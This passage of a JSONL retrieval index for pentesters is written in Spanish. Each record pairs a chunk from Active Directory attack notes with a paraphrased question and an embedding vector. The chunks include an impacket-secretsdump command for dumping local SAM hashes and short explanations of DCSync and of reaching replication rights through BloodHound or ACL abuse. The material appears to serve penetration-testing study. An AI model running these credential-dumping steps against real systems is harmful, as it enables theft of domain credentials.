"fuente": null, "licencia": null, "texto": "## SAM local de una mΓ‘quina\n```bash\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL\n```", "indexar": "cual es un programa para extraer credenciales locales desde el sistema?", "v": [-0.04317, 0.01373, -0.03041, -0.04373, 0.0865, -0.09909, 0.10693, -0.06667, -0.135, -0.10884, -0.18077, 0.03065, -0.08327, -0.13954, 0.0745, -0.01304, 0.03783, -0.09774, 0.05096, -0.00446, -0.13717, -0.03942, -0.07739, -0.03405, -0.00336, 0.06264, -0.05265, -0.09087, -0.02057, 0.0806, 0.0234, 0.0463, 0.0018, -0.05854, 0.01895, 0.0308, 0.03703, 0.05658, -0.0657, 0.0115, 0.08766, -0.04128, 0.00049, -0.03232, 0.07378, -0.03243, 0.03783, 0.07689, -0.00519, -0.15916, -0.09353, -0.01056, -0.037, -0.07873, 0.12322, -0.11171, -0.02272, -0.12554, -0.07125, 0.03705, 0.01363, 0.00811, 0.01948, -0.06576, 0.08008, -0.01431, 0.05702, -0.07542, -0.12328, 0.039, -0.05755, 0.0076, 0.15785, 0.01705, -0.03705, 0.02395, 0.0011, -0.02626, 0.09715, -0.08616, 0.0099, -0.03906, 0.04354, 0.06362, 0.01779, 0.00352, 0.0471, -0.0988, -0.06654, 0.04189, 0.03919, -0.03686, 0.07454, 0.09666, 0.056, -0.08432, 0.09149, 0.08846, -0.0718, 0.0888, 0.02141, -0.1591, -0.10988, 0.18474, -0.0402, -0.01438, 0.10554, 0.05686, -0.00013, -0.01399, 0.02033, 0.02472, -0.01268, 0.01777, -0.10492, 0.00093, -0.0277, 0.05937, 0.05111, 0.01962, -0.06873, -0.03809, -0.02396, -0.06527, 0.08678, 0.03203, -0.06096, 0.06034, -0.00713, 0.03447, 0.04696, 0.03783, 0.02039, 0.01171, -0.01774, -0.10803, 0.04343, -0.00792, -0.02279, 0.01378, -0.02054, 0.01513, 0.06781, -0.01062, 0.04769, 0.01014, 0.02341, -0.07122, 0.02829, -0.02269, -0.01449, 0.09076, -0.05963, 0.00219, -0.09316, 0.01036, 0.08505, -0.02592, -0.04126, 0.01821, -0.00437, -0.06913, 0.07129, -0.03372, 0.01113, -0.04547, -0.04676, -0.0035, 0.0941, 0.08116, -0.01373, 0.07852, 0.02892, -0.05607, -0.00195, 0.01523, 0.04863, -0.16195, 0.04669, -0.0211, -0.06942, 0.12115, 0.07361, 0.05048, -0.03871, -0.01226, -0.03382, 0.05311, -0.02299, -0.00227, 0.04373, -0.02491, -0.0051, 0.01443, -0.02461, 0.02597, -0.00465, -0.05637, 0.01061, 0.00939, -0.13495, 0.03883, 0.0221, -0.04846, 0.03527, 0.1648, 0.03598, -0.01028, 0.00495, 0.14476, -0.0067, -0.02349, 0.05028, 0.01716, -0.07643, -0.01063, -0.04188, -0.01835, 0.01742, -0.02955, 0.0124, -0.04674, 0.06226, 0.07516, -0.02949, -0.10963, 0.01629, 0.08765, -0.00198, 0.00149, -0.03121, -0.07822, -0.00692, -0.03387, -0.00779, -0.02379, 0.02742, 0.01193, -0.02041, -0.13429, 0.00481, 0.0851, -0.0215, -0.07268, -0.06469, 0.02104, -0.0922, 0.00891, 0.05829, -0.03848, -0.01518, 0.05245, 0.04078, -0.04467, 0.0379, 0.03466]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## SAM local de una mΓ‘quina\n```bash\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL\n```", "indexar": "que herramienta sirve para realizar un dumping de secretos a nivel SAM en modo local?", "v": [0.11479, -0.00262, -0.23365, -0.18096, -0.0583, -0.12808, -0.18061, -0.01951, -0.01003, 0.03466, -0.10372, -0.12575, 0.00529, -0.25697, -0.00609, 0.0288, 0.05182, -0.12535, -0.02049, 0.04363, -0.01066, 0.02787, -0.08016, 0.01643, -0.03037, -0.01199, 0.07929, 0.00097, -0.23428, 0.07228, 0.06758, 0.06474, -0.00291, -0.06469, -0.03201, -0.13232, 0.13076, -0.01212, -0.03441, 0.03428, 0.08235, 0.02584, -0.07671, 0.07727, -0.02254, 0.01632, -0.05212, -0.11384, 0.0545, 0.04571, -0.14865, -0.02747, -0.10455, -0.14101, -0.00361, -0.0535, 0.09014, -0.08999, 0.03522, -0.08715, -0.05553, -0.05932, 0.00808, 0.00157, 0.14768, 0.01867, 0.02783, 0.05098, 0.02559, 0.02585, -0.00924, -0.05491, 0.14005, -0.03735, -0.07466, 0.00195, 0.04174, 0.06258, 0.07383, -0.06247, 0.04592, -0.00379, -0.03655, 0.02759, -0.05231, -0.1099, 0.04942, -0.09707, 0.04197, -0.11342, -0.07124, 0.03123, 0.01689, 0.0267, -0.03171, 0.05716, 0.06196, 0.04368, -0.0633, 0.00847, 0.12181, -0.14248, 0.00531, 0.08454, -0.00664, 0.03152, 0.01801, -0.01282, 0.00775, -0.0079, 0.0968, 0.04557, 0.06886, 0.02113, -0.01125, -0.02226, 0.04003, 0.08963, -0.05382, 0.01814, -0.0042, 0.02149, -0.0238, 0.00717, 0.04191, -0.05302, -0.01363, 0.00331, 0.05106, 0.04272, -0.00988, 0.02661, -0.02131, 0.10701, 0.04514, -0.10993, 0.0889, -0.13626, -0.01211, -0.04473, 0.05957, -0.03809, -0.03214, -0.04598, 0.00611, -0.01994, 0.05557, -0.02794, 0.01442, -0.06581, 0.07751, -0.03821, -0.0278, 0.0201, -0.00143, 0.02232, -0.02449, -0.02435, -0.09504, 0.03501, 0.00865, -0.01881, -0.04619, -0.03551, 0.02762, -0.07143, 0.00747, 0.05161, 0.01306, 0.01327, 0.00877, -0.04624, 0.00527, -0.0527, 0.00258, -0.01096, 0.02316, 0.01394, 0.00125, -0.02912, 0.0383, 0.00299, 0.01756, 0.04094, -0.04642, -0.06346, 0.03421, -0.06382, 0.03962, 0.00111, -0.02957, -0.05122, 0.00148, -0.00753, -0.02758, -0.0343, 0.02147, -0.05006, 0.05971, 0.00907, -0.05119, -0.04158, -0.01435, -0.00675, -0.04522, 0.06561, -0.04612, -0.07134, -0.01416, 0.02893, 0.04769, 0.00654, -0.03213, -0.00075, 0.01132, -0.0593, -0.03404, 0.00016, -0.03305, 0.02829, -0.0039, -0.05737, 0.11833, -0.10177, -0.01012, 0.03157, 0.06653, -0.00055, 0.03477, 0.03329, 0.04518, 0.01802, -0.07017, 0.0293, 0.01322, -0.03553, 0.00802, 0.01852, -0.05948, -0.06667, -0.03209, 0.02057, 0.02223, -0.08745, -0.03418, -0.0479, -0.02817, -0.00993, 0.06025, -0.05759, -0.0082, -0.02204, 0.07718, 0.03157, 0.01228, -0.03096]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se obtienen permisos\n- Ser admin del DC, o derechos de replicaciΓ³n β†’ DCSync.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "que herramienta sirve para obtener los permisos DCSync en un dominio activo?", "v": [-0.01931, 0.06238, -0.19724, -0.20585, 0.04677, -0.16716, -0.12838, -0.03964, -0.11862, 0.07651, 0.05032, -0.15005, -0.03494, -0.23656, 0.03632, -0.06307, 0.16411, -0.05651, -0.14306, -0.04666, 0.05566, -0.07696, -0.02943, -0.04874, 0.08476, 0.0001, 0.02126, -0.03624, -0.1691, 0.14016, 0.13142, -0.00311, 0.1451, -0.01031, 0.04226, -0.14658, -0.06142, 0.05668, 0.08095, 0.01759, -0.04083, 0.00242, -0.19518, 0.02312, -0.091, 0.02669, -0.01285, -0.02208, -0.02477, -0.07826, -0.07513, -0.09911, -0.15461, -0.0496, -0.00217, -0.03709, 0.08218, -0.06888, 0.02758, -0.14497, -0.09249, -0.03654, -0.04855, -0.00187, -0.02917, 0.00575, 0.03823, -0.00814, -0.0699, 0.07888, -0.02745, 0.07544, 0.10235, -0.01675, 0.12194, -0.07603, 0.02191, -0.09512, 0.05541, -0.00752, 0.12509, 0.0286, -0.10163, -0.03764, -0.10267, -0.10196, 0.06197, -0.1041, 0.04435, -0.01762, 0.09648, 0.14016, -0.09387, 0.03824, 0.02787, -0.02633, 0.00963, -0.00632, 0.01122, -0.00854, 0.13761, 0.04297, -0.06439, 0.06883, -0.00679, 0.05777, 0.05085, -0.04701, -0.05024, 0.05595, -0.0101, 0.02651, 0.00341, 0.00497, 0.01335, 0.117, -0.05795, -0.0902, 0.01375, -0.03565, -0.0278, -0.01519, -0.06111, 0.02179, -0.00757, 0.01472, -0.02316, 0.04036, -0.03943, -0.10056, 0.02639, -0.0734, 0.00886, -0.00889, -0.00064, 0.02079, 0.03235, -0.0025, -0.11137, -0.02085, 0.02825, 0.0504, -0.00364, -0.00624, 0.03876, 0.00389, 0.06138, -0.03939, -0.04206, -0.0342, -0.00839, -0.04273, -0.02904, 0.02042, -0.05448, 0.04084, -0.09303, 0.001, -0.05969, 0.05917, -0.03921, 0.01306, 0.00974, 0.03316, 0.01212, -0.03463, 0.00368, -0.02584, 0.04033, 0.10267, -0.03787, 0.01837, 0.03992, -0.07662, -0.02548, -0.01092, 0.00397, -0.0331, 0.03735, -0.04445, -0.01231, -0.04305, -0.02268, 0.00113, -0.02509, 0.01669, 0.02546, -0.04287, -0.00122, 0.05282, 0.00354, 0.04878, 0.00604, -0.05507, 0.05297, -0.02669, -0.0272, -0.02023, 0.04433, -0.05259, -0.00071, -0.03452, -0.00821, -0.02299, 0.05059, 0.00422, 0.00218, 0.05378, -0.00104, 0.00358, -0.00957, -0.02728, 0.05956, -0.02685, 0.00611, -0.01072, -0.00546, 0.01051, -0.00591, -0.04005, 0.01135, -0.00112, 0.00607, -0.01157, 0.04449, -0.00132, 0.05966, -0.00313, 0.02173, 0.05508, 0.01127, 0.02421, -0.0487, -0.00695, 0.03881, 0.00637, 0.04639, 0.00919, 0.00262, 0.00549, 0.00465, -0.01189, 0.01111, 0.00408, -0.0474, -0.04006, 0.02008, 0.00816, -0.01222, -0.06555, 0.00644, -0.00377, 0.03335, 0.01313, 0.00132, -0.0236]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se obtienen permisos\n- Ser admin del DC, o derechos de replicaciΓ³n β†’ DCSync.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "con quΓ© puedo acceder a los derechos de replicaciΓ³n del directorio activo?", "v": [-0.05552, 0.05122, -0.11553, -0.11204, 0.13754, 0.00774, 0.00978, 0.10122, -0.17338, 0.01607, 0.01824, -0.13687, -0.04481, -0.13804, 0.15863, -0.09738, 0.16363, -0.00864, -0.02663, -0.06005, 0.07369, -0.03242, -0.05729, 0.04548, 0.07287, -0.02318, 0.03942, 0.04815, 0.02103, 0.04695, 0.07839, -0.04775, 0.01939, -0.08456, 0.00457, 0.09381, 0.08837, 0.13552, 0.08233, 0.06595, -0.0534, -0.03777, -0.16828, 0.00822, -0.03166, 0.01728, -0.0235, -0.0585, -0.06467, -0.01791, -0.03041, -0.02333, -0.12284, -0.1282, -0.01578, -0.01089, 0.16169, -0.05398, 0.12404, -0.08507, -0.03639, 0.08502, 0.03741, 0.04817, -0.02304, -0.08465, 0.07006, -0.07678, -0.07963, 0.04995, -0.05426, 0.02767, 0.0309, 0.00014, -0.01681, -0.03649, -0.01061, -0.16897, -0.05708, 0.09325, -0.0895, -0.00298, 0.01931, -0.06836, -0.05817, -0.07454, 0.02643, -0.09927, 0.01999, -0.10859, 0.07628, 0.08468, -0.04574, 0.04648, -0.05671, -0.06069, -0.10026, 0.03205, -0.00974, -0.01961, -0.01132, 0.05764, -0.11314, 0.12853, 0.12007, 0.06169, -0.02223, 0.02559, -0.07312, 0.00665, -0.03399, -0.05058, -0.04879, -0.04253, 0.05287, 0.05777, -0.15561, -0.07967, 0.07539, 0.09979, -0.00019, -0.09385, 0.00043, 0.01536, 0.01088, 0.01327, 0.08328, 0.10427, -0.05596, -0.02838, -0.03114, 0.00427, 0.02717, -0.09975, -0.01467, -0.09088, -0.00711, 0.04866, 0.04665, -0.04686, 0.03525, 0.0598, 0.02645, 0.00376, -0.03289, -0.03252, -0.00099, -0.04519, -0.05286, -0.07451, 0.02229, 0.043, 0.08647, 0.02174, 0.00853, 0.03571, 0.01866, -0.06557, 0.03316, 0.04405, -0.08384, -0.01854, -0.07615, 0.06384, -0.00112, 0.00206, -0.04161, -0.09914, 0.02046, -0.00294, -0.08759, 0.07285, 0.03311, -0.11326, -0.02352, -0.06637, -0.00421, -0.0275, 0.10176, -0.01554, -0.01119, 0.00462, -0.04397, -0.05129, -0.02575, -0.03616, -0.00131, 0.00324, 0.02067, 0.06957, 0.06676, 0.03379, 0.03578, -0.02873, 0.04736, -0.00708, -0.05795, 0.0335, 0.00935, -0.00411, -0.02479, 0.00589, -0.02028, -0.00526, 0.06443, 0.03661, -0.02057, 0.08863, -0.02278, -0.0025, -0.00756, 0.0165, 0.12188, 0.04251, -0.075, 0.01079, 0.039, 0.01171, -0.01066, 0.00178, 0.06435, 0.01039, 0.01231, 0.01635, 0.01954, -0.07154, 0.09495, -0.00539, 0.02944, 0.00777, -0.00747, 0.05018, -0.04317, -0.05219, 0.05045, 0.06247, -0.00269, 0.0342, -0.03045, 0.01026, -0.00026, 0.13017, -0.00768, 0.02014, 0.0006, -0.03088, -0.02535, 0.00235, 0.00166, -0.05665, -0.03511, 0.00545, 0.03398, -0.09061, 0.00731, -0.03393]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se obtienen permisos\n- Ser admin del DC, o derechos de replicaciΓ³n β†’ DCSync.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "cual es una tecnica para levantar permisos de administrador en Active Directory?", "v": [0.0499, 0.09462, -0.04285, -0.25546, 0.01732, -0.06393, -0.03278, -0.07007, -0.16854, 0.01421, 0.04817, -0.0963, -0.0317, -0.03947, 0.112, -0.09272, 0.14802, -0.12181, 0.0475, 0.02328, 0.04019, 0.07751, -0.0097, 0.08253, 0.04102, -0.01956, 0.06163, -0.09636, -0.12949, -0.12687, 0.03207, 0.06191, 0.04317, -0.02246, 0.14084, 0.00992, -0.03368, 0.05502, 0.03853, 0.06517, -0.16042, -0.00773, -0.15282, 0.04893, 0.06382, 0.04408, 0.06485, -0.12817, 0.06831, 0.02996, -0.06182, -0.03231, -0.01315, -0.10992, 0.02292, 0.02221, 0.10062, -0.05051, -0.00333, -0.05348, -0.01592, -0.06473, -0.00017, 0.00442, -0.09565, -0.03578, 0.14165, -0.07645, -0.05926, 0.06657, 0.00321, 0.05189, 0.04362, 0.13171, 0.07177, 0.0713, -0.05503, 0.0046, -0.04324, 0.00141, 0.04163, 0.01247, -0.11751, -0.02572, -0.12619, -0.25938, -0.03174, -0.1108, 0.00265, -0.0147, 0.05598, -0.00204, -0.03535, -0.06408, 0.05417, -0.0062, 0.05098, 0.12106, -0.03508, 0.06078, 0.02063, -0.01034, 0.02419, 0.13645, -0.01551, 0.11241, 0.01186, -0.00721, -0.0869, 0.03394, -0.0243, 0.00468, -0.04259, 0.04979, 0.00738, 0.09356, -0.11082, -0.10811, -0.07113, 0.02437, -0.01227, -0.10237, 0.08443, 0.09665, 0.0502, 0.00962, 0.00856, 0.12408, 0.01089, 0.04086, 0.01894, 0.007, 0.04371, -0.03905, -0.08883, 0.03822, -0.00874, 0.01411, -0.02737, -0.07024, -0.0923, 0.04602, 0.04568, 0.00414, 0.05021, 0.00641, -0.01978, -0.02604, -0.03927, -0.05496, 0.04237, 0.04407, 0.00489, 0.1078, 0.03533, 0.05552, 0.0027, -0.05521, -0.04635, 0.09889, 0.05409, 0.00348, -0.00921, 0.0251, -0.03402, 0.01333, -0.12937, -0.05266, 0.01734, 0.0484, -0.06307, 0.00232, 0.02151, -0.02333, 0.02786, -0.04249, -0.01954, -0.03754, 0.01258, -0.02608, -0.02396, 0.01806, 0.01485, 0.01057, -0.0338, -0.01989, 0.0263, 0.00949, -0.00981, 0.02719, 0.03117, 0.04706, -0.03226, -0.06049, -0.02846, -0.05006, 0.03192, -0.04288, -0.03703, -0.05642, 0.02034, -0.00684, -0.01341, -0.04678, 0.05018, -0.05616, 0.00983, 0.07465, 0.04445, -0.0347, -0.03173, 0.00082, 0.08417, 0.00568, -0.07549, 0.01124, -0.01433, 0.0066, -0.03539, -0.03571, 0.05222, -0.01724, 0.04557, -0.01192, 0.06422, -0.03914, 0.03535, 0.026, -0.00372, 0.07225, -0.05627, 0.02246, 0.02348, 0.01456, 0.04592, 0.04305, 0.05493, -0.03577, 0.00456, 0.00945, 0.0443, 0.04258, 0.05495, -0.00749, -0.07684, -0.02676, -0.02095, 0.02844, -0.04389, -0.05235, 0.05672, 0.01354, 0.00061, -0.03327, -0.0056, -0.04711]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# DCSync\n\n> Con permisos de **replicaciΓ³n de directorio** (DS-Replication-Get-Changes), pides al DC que te \"replique\" los hashes **como si fueras otro DC**. No necesitas pisar el DC.", "indexar": "que herramienta sirve para replicar hashes de AD sin tener permisos administrativos directos?", "v": [0.12306, -0.02755, -0.1013, -0.16164, 0.16517, -0.05537, -0.0449, -0.05955, -0.0979, 0.06592, -0.01106, -0.0523, -0.01302, -0.08527, 0.25723, -0.03608, 0.0498, -0.0682, 0.00662, 0.09292, 0.15842, 0.04974, -0.12373, 0.01528, -0.02411, -0.09006, 0.1104, 0.00079, -0.26665, -0.05892, 0.00689, 0.05307, 0.03241, -0.0197, -0.05347, 0.06454, -0.04434, 0.10085, -0.04746, 0.10934, -0.01729, 0.07671, -0.19264, 0.00568, -0.04622, -0.07752, -0.05961, 0.0076, -0.10624, -0.0567, -0.02729, -0.15326, -0.16086, -0.08558, -0.01221, -0.10835, 0.1641, -0.08853, -0.04092, -0.0863, -0.03351, 0.03799, 0.00348, 0.0194, -0.0048, 0.00495, 0.13225, -0.0839, -0.06203, 0.00507, -0.14743, 0.05404, 0.05029, 0.00533, -0.0246, -0.04075, -0.06875, 0.04927, -0.02408, 0.0567, 0.06707, -0.05821, -0.04381, -0.00851, -0.01338, -0.13144, -0.01954, 0.00133, 0.01844, -0.01074, -0.01454, 0.05672, -0.02191, 0.03691, -0.03104, -0.0535, -0.00875, -0.0095, -0.03788, 0.04224, 0.06111, -0.03993, -0.10136, 0.08112, -0.04975, 0.10551, 0.00493, -0.05466, 0.00109, 0.05949, 0.10366, -0.03771, -0.05434, 0.02489, 0.05889, 0.10573, -0.05185, -0.03983, -0.05129, -0.00612, 0.03833, -0.01344, 0.03905, 0.05663, -0.0431, -0.0274, -0.01707, 0.0209, -0.02962, -0.01372, 0.04187, -0.01147, -0.01248, 0.04317, -0.00332, 0.01321, -0.03021, -0.02396, -0.04299, -0.10782, 0.00287, 0.05543, -0.04246, -0.09033, 0.02341, -0.01156, 0.02472, -0.06393, -0.00343, -0.04405, 0.06089, -0.06047, 0.01192, 0.11789, -0.09155, 0.0158, -0.04771, -0.01783, -0.10106, 0.09325, -0.06098, -0.03631, -0.00488, 0.09087, 0.02864, -0.02369, -0.00943, 0.00506, 0.07198, 0.09177, -0.00185, -0.0156, 0.07539, -0.06478, 0.02813, -0.02518, -0.01917, 0.006, 0.01211, -0.04113, -0.0754, -0.04632, -0.04938, -0.04479, -0.00437, -0.03153, -0.0042, 0.02619, 0.02942, 0.02158, 0.07448, 0.03449, 0.02464, -0.02641, 0.04557, 0.04804, 0.03127, -0.037, -0.00298, -0.01961, 0.01506, -0.00924, -0.01696, -0.05493, 0.08132, 0.03587, -0.03601, 0.03241, -0.00694, 0.00869, -0.0424, 0.00572, 0.0406, -0.01762, -0.01488, -0.0624, 0.05446, -0.01527, 0.02848, -0.00655, 0.0475, 0.02042, 0.04535, -0.00347, 0.04236, 0.03626, 0.04747, 0.04605, 0.02865, 0.02844, 0.02786, 0.03022, -0.01067, -0.00314, 0.0391, -0.0911, 0.00595, 0.00932, -0.03285, -0.02173, 0.01017, 0.04764, 0.0344, -0.02884, -0.03696, -0.0585, 0.04194, -0.01858, -0.03372, -0.07145, -0.02656, 0.05237, 0.03735, -0.03694, 0.00507, -0.04221]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# DCSync\n\n> Con permisos de **replicaciΓ³n de directorio** (DS-Replication-Get-Changes), pides al DC que te \"replique\" los hashes **como si fueras otro DC**. No necesitas pisar el DC.", "indexar": "con que puedo pedir a un dominio controlado que replique cambios como si fuera otro controlador de dominio?", "v": [0.027, 0.11695, -0.1288, -0.09667, -0.05166, -0.02521, 0.0851, 0.07661, -0.12053, -0.06154, 0.05601, -0.12393, 0.06969, -0.20401, 0.00161, -0.11649, 0.15217, 0.03939, -0.01434, -0.02737, 0.03139, -0.12703, 0.08548, -0.08862, 0.0712, -0.03366, 0.01902, -0.03658, -0.0608, 0.05195, 0.02064, -0.03339, 0.0795, 0.03205, -0.00486, -0.05613, 0.01518, 0.06893, 0.1427, 0.12294, 0.02332, -0.13068, -0.09552, -0.02866, -0.06045, 0.04066, -0.00436, -0.05793, 0.05798, -0.07036, -0.04451, -0.09553, -0.06537, 0.01705, 0.04532, -0.04599, 0.15141, -0.11131, 0.07785, -0.09728, -0.03975, -0.11274, 0.09989, 0.08631, -0.09782, -0.04633, -0.06379, -0.01411, -0.04252, 0.01793, -0.04908, -0.0266, -0.00085, 0.00866, 0.05203, -0.07368, 0.05175, 0.00995, 0.05194, -0.03622, -0.01267, -0.00864, -0.11447, -0.01802, 0.03072, -0.08115, -0.18765, -0.21086, -0.01741, 0.06169, 0.01746, -0.02014, -0.04514, -0.03793, -0.04715, -0.01254, -0.03009, -0.0093, -0.09149, -0.02405, 0.12286, 0.16702, -0.13618, 0.07565, 0.10073, 0.14862, 0.08978, -0.14951, -0.00595, 0.0009, -0.01342, -0.02922, -0.0071, -0.0153, -0.022, 0.05437, -0.04567, -0.03522, 0.01465, -0.02604, -0.08229, -0.08139, 0.12618, -0.03468, 0.01736, 0.01671, 0.01461, 0.00467, 0.05833, -0.06356, -0.03286, -0.03355, 0.07122, -0.07297, -0.0492, 0.07208, -0.04432, 0.02881, 0.00727, 0.01034, -0.08922, 0.06412, 0.01947, -0.02704, 0.06611, -0.1333, 0.02314, -0.06499, -0.06132, -0.00665, -0.08965, 0.03356, 0.02258, 0.1107, -0.01251, 0.05799, -0.04958, -0.00066, 0.02384, 0.08793, -0.05117, 0.0046, -0.0808, 0.03618, 0.04223, -0.00491, -0.02781, -0.0276, 0.01042, 0.03971, -0.0757, 0.02736, -0.01404, 0.00462, -0.03807, -0.04216, -0.011, -0.03205, -0.00898, -0.00998, -0.02823, 0.03447, -0.02793, 0.05102, -0.03823, 0.0648, 0.01692, 0.02024, -0.00221, 0.01389, 0.04857, 0.08427, -0.0139, -0.02778, 0.01602, -0.01188, 0.02477, 0.03758, -0.01996, -0.00838, -0.00908, -0.03256, -0.00575, -0.055, -0.02511, -0.01233, -0.01842, 0.05584, 0.03295, -0.0306, -0.02545, -0.01871, 0.04559, 0.02022, -0.01701, -0.01886, 0.00227, -0.02986, -0.0164, -0.04634, 0.03317, 0.05092, 0.05324, 0.00297, -0.00912, -0.01127, -0.00971, -0.00856, 0.03654, 0.05797, -0.00654, 0.03604, -0.02142, -0.04665, 0.0433, 0.02052, 0.05793, -0.02475, -0.01021, -0.02482, -0.05334, 0.0528, -0.00773, -0.08813, -0.06683, -0.09635, -0.10736, 0.01466, 0.00313, 0.00878, 0.01294, 0.02463, 0.01328, -0.04697, -0.03556, -0.00729]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se llega\n- Un usuario con esos derechos (te lo dice BloodHound: arista `DCSync` / `GetChangesAll`).\n- O un ACL abuses que te conceda esos derechos.", "indexar": "ΒΏcΓ³mo puedo verificar si tengo permisos de lectura completa en Active Directory?", "v": [-0.11873, 0.20489, -0.14198, -0.11039, 0.12406, -0.04298, -0.01058, -0.00805, -0.11214, -0.18177, 0.00846, -0.03595, -0.00225, -0.08363, 0.13486, -0.03631, 0.10528, -0.068, -0.00127, -0.04536, 0.14415, -0.11685, -0.14853, 0.0119, 0.05689, 0.04194, 0.00507, -0.08104, 0.0276, -0.10582, -0.00469, -0.00076, 0.12675, 0.00883, 0.02724, 0.04351, 0.00605, 0.00594, 0.10317, 0.013, -0.00262, 0.14439, -0.0263, 0.01716, -0.00344, 0.03946, 0.00269, -0.06434, -0.08473, -0.02231, -0.05684, 0.04096, -0.03371, -0.04955, -0.06383, 0.01735, 0.0838, 0.00165, 0.04031, -0.1332, -0.0084, -0.0394, 0.02509, -0.0103, -0.00903, -0.06104, 0.12615, 0.01412, -0.04274, 0.09463, -0.08905, 0.04058, -0.00472, 0.10414, -0.04225, -0.06036, -0.00034, -0.10832, 0.04085, 0.09474, 0.16096, 0.04057, -0.04625, -0.07791, -0.05651, -0.11414, -0.06274, -0.15233, 0.03652, -0.00595, 0.02804, 0.10529, -0.03101, 0.01905, -0.03366, 0.04456, -0.01704, 0.05935, -0.04752, 0.08638, 0.02111, -0.01298, 0.05477, 0.10703, -0.05697, -0.00839, -0.08551, -0.0146, -0.07332, 0.00408, 0.01659, 0.01849, -0.12838, -0.07898, 0.05111, 0.08598, -0.0664, -0.10267, -0.00637, 0.02918, -0.12697, -0.00416, -0.01616, 0.05259, 0.06775, -0.0106, -0.00214, 0.1135, 0.00158, 0.06817, 0.00238, 0.00983, 0.01002, -0.09493, -0.04441, -0.02844, -0.05991, 0.00177, -0.07052, -0.05464, -0.02841, -0.02026, 0.0587, 0.07657, 0.03144, 0.01572, -0.06945, 0.04141, -0.07545, -0.02864, -0.01637, -0.01123, 0.02513, 0.08776, 0.05626, 0.10894, 0.02697, -0.03515, 0.01803, 0.03821, 0.05121, 0.07382, -0.01274, -0.00295, 0.00059, 0.0405, -0.07301, -0.01623, 0.07273, 0.02805, -0.09451, 0.02648, -0.02648, -0.11473, 0.04097, -0.03724, -0.02495, 0.02461, 0.02564, -0.02802, -0.07695, 0.03147, -0.09185, -0.02781, -0.03206, -0.00571, 0.04369, -0.07591, 0.04271, 0.02542, 0.06216, 0.08532, 0.00987, -0.0316, 0.03187, -0.02633, 0.00057, 0.01077, 0.00465, -0.09391, -0.00614, 0.04343, -0.04041, -0.01616, 0.0835, -0.04612, -0.05174, 0.12083, 0.03091, -0.01749, -0.00725, -0.00118, 0.11227, -0.03822, -0.08667, 0.00435, -0.03084, 0.00908, -0.03169, -0.00932, 0.0241, 0.01936, 0.04697, 0.03901, 0.06277, -0.01262, 0.03173, -0.02024, 0.05688, 0.15219, 0.00628, 0.02353, 0.00454, 0.03002, 0.02808, 0.0209, 0.02451, 0.0212, 0.0111, 0.01201, 0.0552, 0.02995, 0.04689, -0.00145, -0.02908, -0.00552, -0.05749, 0.00872, -0.09409, -0.04926, 0.04665, -0.01136, 0.01128, -0.04931, 0.0627, -0.04181]} +{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se llega\n- Un usuario con esos derechos (te lo dice BloodHound: arista `DCSync` / `GetChangesAll`).\n- O un ACL abuses que te conceda esos derechos.", "indexar": "ΒΏquΓ© herramienta sirve para detectar si un usuario tiene acceso a todo el bosque?", "v": [-0.13601, 0.02134, -0.18158, -0.14876, -0.04395, -0.15202, -0.12928, -0.11577, 0.03366, -0.15175, -0.0405, -0.03658, -0.15628, 0.04037, 0.13284, -0.041, 0.1281, -0.0051, 0.00557, -0.00305, 0.03988, 0.02235, -0.07963, 0.00213, -0.07039, -0.10029, 0.07338, -0.09252, -0.0901, 0.00825, 0.02055, -0.04224, 0.0755, -0.00564, -0.10754, -0.10933, -0.00742, 0.05003, -0.00853, 0.04117, 0.04713, 0.02673, -0.10708, 0.0442, -0.06453, 0.0137, -0.08555, -0.00628, 0.02371, 0.09749, -0.03908, -0.0631, -0.164, -0.04197, 0.00395, -0.10239, 0.19482, -0.056, 0.15021, -0.12808, -0.16175, -0.0188, 0.03124, -0.0766, 0.04992, -0.15483, 0.04582, -0.01783, -0.04694, -0.03394, -0.00951, -0.05414, 0.03753, -0.02296, 0.03783, 0.00735, 0.00771, 0.01065, 0.11237, 0.02413, 0.0377, -0.03996, -0.05207, -0.02307, -0.09939, -0.0261, 0.1501, -0.05086, 0.04864, -0.17307, -0.06028, 0.07783, 0.05471, 0.04529, -0.02176, -0.03971, 0.0368, -0.02479, -0.04257, -0.04589, 0.08132, -0.03185, -0.03385, 0.0867, -0.03772, 0.01129, -0.02736, -0.05746, -0.13029, -0.04597, -0.0015, -0.02017, -0.03561, 0.01078, 0.00039, 0.10462, 0.00136, -0.13709, -0.03768, -0.01625, -0.03903, 0.09576, -0.04317, -0.02577, 0.04832, -0.0794, -0.02841, 0.08225, -0.00191, -0.08015, -0.06379, -0.04741, -0.06331, -0.06682, -0.07079, -0.03035, -0.02213, -0.17033, -0.0586, 0.0579, 0.00215, 0.05104, 